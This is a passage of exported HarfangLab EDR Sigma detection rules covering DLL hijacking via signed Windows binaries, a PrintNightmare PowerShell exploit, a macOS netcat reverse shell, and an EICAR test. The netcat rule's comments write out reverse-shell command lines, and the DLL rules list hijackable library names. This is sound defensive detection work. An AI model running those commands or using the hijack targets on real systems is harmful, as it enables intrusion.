],
"name": "t1574_001_dll_hijacking_hvsievaluator.yml",
"content": "title: DLL Hijacking via hvsievaluator.exe\nid: 6d175d58-b1b2-4cc1-bd38-b7693781a88a\ndescription: |\n Detects potential Windows DLL Hijacking via hvsievaluator.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'hvsievaluator.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\configmanager2.dll'\n - '\\DismApi.DLL'\n - '\\DMCmnUtils.dll'\n - '\\iri.dll'\n - '\\omadmapi.dll'\n - '\\policymanager.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6d175d58-b1b2-4cc1-bd38-b7693781a88a",
"rule_name": "DLL Hijacking via hvsievaluator.exe",
"rule_description": "Detects potential Windows DLL Hijacking via hvsievaluator.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6d3107af-5eaf-451f-ae32-aa021b68dc59",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097524Z",
"creation_date": "2026-03-23T11:45:34.097527Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097531Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_lpremove.yml",
"content": "title: DLL Hijacking via lpremove.exe\nid: 6d3107af-5eaf-451f-ae32-aa021b68dc59\ndescription: |\n Detects potential Windows DLL Hijacking via lpremove.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'lpremove.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\AppXAllUserStore.dll'\n - '\\AppXDeploymentClient.dll'\n - '\\Bcp47Langs.dll'\n - '\\DNSAPI.dll'\n - '\\FirewallAPI.dll'\n - '\\fwbase.dll'\n - '\\StateRepository.Core.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6d3107af-5eaf-451f-ae32-aa021b68dc59",
"rule_name": "DLL Hijacking via lpremove.exe",
"rule_description": "Detects potential Windows DLL Hijacking via lpremove.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6ddeb55d-9931-48b9-94c9-05459a05f932",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.601046Z",
"creation_date": "2026-03-23T11:45:34.601050Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.601057Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_cttune.yml",
"content": "title: DLL Hijacking via cttune.exe\nid: 6ddeb55d-9931-48b9-94c9-05459a05f932\ndescription: |\n Detects potential Windows DLL Hijacking via cttune.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'cttune.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DWrite.dll'\n - '\\fastprox.dll'\n - '\\OLEACC.dll'\n - '\\UxTheme.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6ddeb55d-9931-48b9-94c9-05459a05f932",
"rule_name": "DLL Hijacking via cttune.exe",
"rule_description": "Detects potential Windows DLL Hijacking via cttune.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6df113cd-4125-42f2-b630-77bf2361c707",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096214Z",
"creation_date": "2026-03-23T11:45:34.096216Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096220Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_register_cimprovider.yml",
"content": "title: DLL Hijacking via register-cimprovider.exe\nid: 6df113cd-4125-42f2-b630-77bf2361c707\ndescription: |\n Detects potential Windows DLL Hijacking via register-cimprovider.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'register-cimprovider.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\miutils.dll'\n - '\\prvdmofcomp.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6df113cd-4125-42f2-b630-77bf2361c707",
"rule_name": "DLL Hijacking via register-cimprovider.exe",
"rule_description": "Detects potential Windows DLL Hijacking via register-cimprovider.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6e045b70-4db3-4a16-8bf2-37ebd9f3cbb1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076279Z",
"creation_date": "2026-03-23T11:45:34.076281Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076285Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/calebstewart/CVE-2021-1675",
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675",
"https://attack.mitre.org/techniques/T1547/012/"
],
"name": "t1547_012_possible_printnightmare_exploit_using_powershell.yml",
"content": "title: Possible PrintNightmare Privilege Escalation Exploit via PowerShell\nid: 6e045b70-4db3-4a16-8bf2-37ebd9f3cbb1\ndescription: |\n Detects the usage PowerShell Proof-of-concept to exploit the PrintNightmare vulnerability (CVE-2021-1675).\n Attackers can use this print spooler vulnerability to locally elevate privileges on a target host.\n It is recommended to investigate all PowerShell activity related to spoolsv.exe processes and immediately apply Microsoft security patch KB5004945 while disabling the Print Spooler service on non-printing servers.\nreferences:\n - https://github.com/calebstewart/CVE-2021-1675\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1675\n - https://attack.mitre.org/techniques/T1547/012/\ndate: 2022/09/29\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1547.012\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Exploit.CVE-2021-1675\n - classification.Windows.Exploit.PrintNightmare\n - classification.Windows.Script.PowerShell\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains|all:\n - '$nightmare_data'\n - \"$winspool = $Types['winspool.drv']\"\n - 'function Invoke-Nightmare'\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6e045b70-4db3-4a16-8bf2-37ebd9f3cbb1",
"rule_name": "Possible PrintNightmare Privilege Escalation Exploit via PowerShell",
"rule_description": "Detects the usage PowerShell Proof-of-concept to exploit the PrintNightmare vulnerability (CVE-2021-1675).\nAttackers can use this print spooler vulnerability to locally elevate privileges on a target host.\nIt is recommended to investigate all PowerShell activity related to spoolsv.exe processes and immediately apply Microsoft security patch KB5004945 while disabling the Print Spooler service on non-printing servers.\n",
"rule_creation_date": "2022-09-29",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1547.012"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6e3969d3-3c5c-4782-9b61-bf6789d64008",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618060Z",
"creation_date": "2026-03-23T11:45:34.618062Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618067Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux",
"https://gtfobins.github.io/gtfobins/nc/",
"https://attack.mitre.org/techniques/T1059/004/"
],
"name": "t1059_004_reverse_shell_netcat_macos.yml",
"content": "title: Reverse Shell Executed via Netcat (macOS)\nid: 6e3969d3-3c5c-4782-9b61-bf6789d64008\ndescription: |\n Detects a suspicious command line related to a reverse shell execution via Netcat.\n A reverse shell is a shell session that is initiated from a remote machine.\n Attackers often use reverse shell to bypass firewall restrictions.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://gtfobins.github.io/gtfobins/nc/\n - https://attack.mitre.org/techniques/T1059/004/\ndate: 2022/11/14\nmodified: 2025/09/25\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Netcat\n - classification.macOS.Behavior.RemoteShell\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n CommandLine|contains:\n # mknod /tmp/backpipe p; /bin/sh /tmp/backpipe\n # mknod /tmp/backpipe p; /bin/sh '\n - 'mknod *sh*<*|*nc *|*tee'\n # mknod /tmp/backpipe p; nc 192.168.56.1 8888 /tmp/backpipe\n - 'mknod *nc *<*|*sh*-i*|*tee'\n - 'mknod *nc *<*|*sh*-i*>'\n\n exclusion_homebrew:\n CommandLine|contains|all:\n - 'abort ?Homebrew is only supported on macOS and Linux.?'\n - '# On Linux, this script installs to /home/linuxbrew/.linuxbrew only'\n - 'https://docs.brew.sh/Homebrew-on-Linux'\n\n exclusion_httpd:\n CurrentDirectory: '/private/tmp/httpd-*'\n\n exclusion_kitten_ssh:\n CommandLine|contains: '# Copyright (C) 2022 Kovid Goyal '\n Image: '/usr/bin/ssh'\n ParentCommandLine|contains: 'kitten ssh'\n\n exclusion_munki:\n - Ancestors|contains: '/Library/MunkiReport/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python'\n - ParentCommandLine|contains: '/usr/local/munkireport/scripts/'\n\n exclusion_mosyle:\n Ancestors|contains: '|/Library/Application Support/Mosyle/MosyleMDM.app/Contents/MacOS/MosyleMDM|'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6e3969d3-3c5c-4782-9b61-bf6789d64008",
"rule_name": "Reverse Shell Executed via Netcat (macOS)",
"rule_description": "Detects a suspicious command line related to a reverse shell execution via Netcat.\nA reverse shell is a shell session that is initiated from a remote machine.\nAttackers often use reverse shell to bypass firewall restrictions.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2025-09-25",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6e62da17-4a00-4116-8c84-f1a3ddd01757",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.091533Z",
"creation_date": "2026-03-23T11:45:34.091535Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.091539Z",
"rule_level": "low",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1204/"
],
"name": "t1204_harfanglab_eicar_linux.yml",
"content": "title: Harfanglab EICAR (Linux)\nid: 6e62da17-4a00-4116-8c84-f1a3ddd01757\ndescription: |\n This is a test rule that detects the string 'EICAR-STANDARD-HARFANGLAB-TEST-STRING' inside the command-line of a process.\n EICAR files are files that were originally used to test the response of computer AV programs. HarfangLab has used this concept to create a test rule for its EDR.\n This does not represent inherently malicious activity and there should be no need for investigation if these tests are expected in your environment.\n If this rule has triggered, it means that HarfangLab EDR detection engines are operating properly.\nreferences:\n - https://attack.mitre.org/techniques/T1204/\ndate: 2023/11/30\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Malware.EICAR\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n CommandLine|contains: 'EICAR-STANDARD-HARFANGLAB-TEST-STRING'\n condition: selection\nlevel: low\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6e62da17-4a00-4116-8c84-f1a3ddd01757",
"rule_name": "Harfanglab EICAR (Linux)",
"rule_description": "This is a test rule that detects the string 'EICAR-STANDARD-HARFANGLAB-TEST-STRING' inside the command-line of a process.\nEICAR files are files that were originally used to test the response of computer AV programs. HarfangLab has used this concept to create a test rule for its EDR.\nThis does not represent inherently malicious activity and there should be no need for investigation if these tests are expected in your environment.\nIf this rule has triggered, it means that HarfangLab EDR detection engines are operating properly.\n",
"rule_creation_date": "2023-11-30",
"rule_modified_date": "2025-01-27",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6e759997-33d8-452a-8ead-44744fab7782",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.099042Z",
"creation_date": "2026-03-23T11:45:34.099044Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.099049Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_disksnapshot.yml",
"content": "title: DLL Hijacking via disksnapshot.exe\nid: 6e759997-33d8-452a-8ead-44744fab7782\ndescription: |\n Detects potential Windows DLL Hijacking via disksnapshot.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'disksnapshot.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.dll'\n - '\\cryptsp.dll'\n - '\\rsaenh.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6e759997-33d8-452a-8ead-44744fab7782",
"rule_name": "DLL Hijacking via disksnapshot.exe",
"rule_description": "Detects potential Windows DLL Hijacking via disksnapshot.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6e840fce-0f8e-4009-8180-c6e416c31634",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
